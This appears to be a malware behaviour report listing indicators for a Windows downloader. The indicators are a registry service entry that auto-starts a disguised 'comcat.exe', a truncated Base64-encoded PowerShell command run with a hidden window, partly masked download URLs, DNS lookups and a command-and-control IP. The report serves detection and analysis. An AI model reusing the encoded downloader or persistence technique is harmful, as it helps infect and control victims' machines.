Technical information
- [<HKLM>\System\CurrentControlSet\Services\comcat] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\comcat] 'ImagePath' = '"%WINDIR%\SysWOW64\newdev\comcat.exe"'
- 'comcat' "%WINDIR%\SysWOW64\newdev\comcat.exe"
- 'comcat' %WINDIR%\SysWOW64\newdev\comcat.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAEsAUABVAFcAZQBrAGIAPQAnAEYATABRAEoATwBkAGEAZwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBgAEMAdQBgAFIASQBgAFQAWQBwAFIATwBUAE8AYwBvAEwAIgAgAD...
- %HOMEPATH%\280.exe
- %WINDIR%\syswow64\newdev\comcat.exe
- %HOMEPATH%\280.exe to %WINDIR%\syswow64\newdev\comcat.exe
- '14#.#05.151.124':443
- http://pu###rfiz.net/btrsports/3_qr_elsv8z8sb/
- http://rn###ork.com.br/administrator/itn1q_s_nhf/
- http://es##ft.com/cgi-bin/bmkhn_v_pd5gahs8/
- http://14#.##5.151.124:443/hXsk/lUWcuxGna7XMD54bXvf/JsLG9h/AlKx/Na3YrdtHHGr/ via 14#.#05.151.124
- DNS ASK pu###rfiz.net
- DNS ASK rn###ork.com.br
- DNS ASK es##ft.com
- '%HOMEPATH%\280.exe'
- '%WINDIR%\syswow64\newdev\comcat.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAEsAUABVAFcAZQBrAGIAPQAnAEYATABRAEoATwBkAGEAZwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBgAEMAdQBgAFIASQBgAFQAWQBwAFIATwBUAE8AYwBvAEwAIgAgAD...' (with hidden window)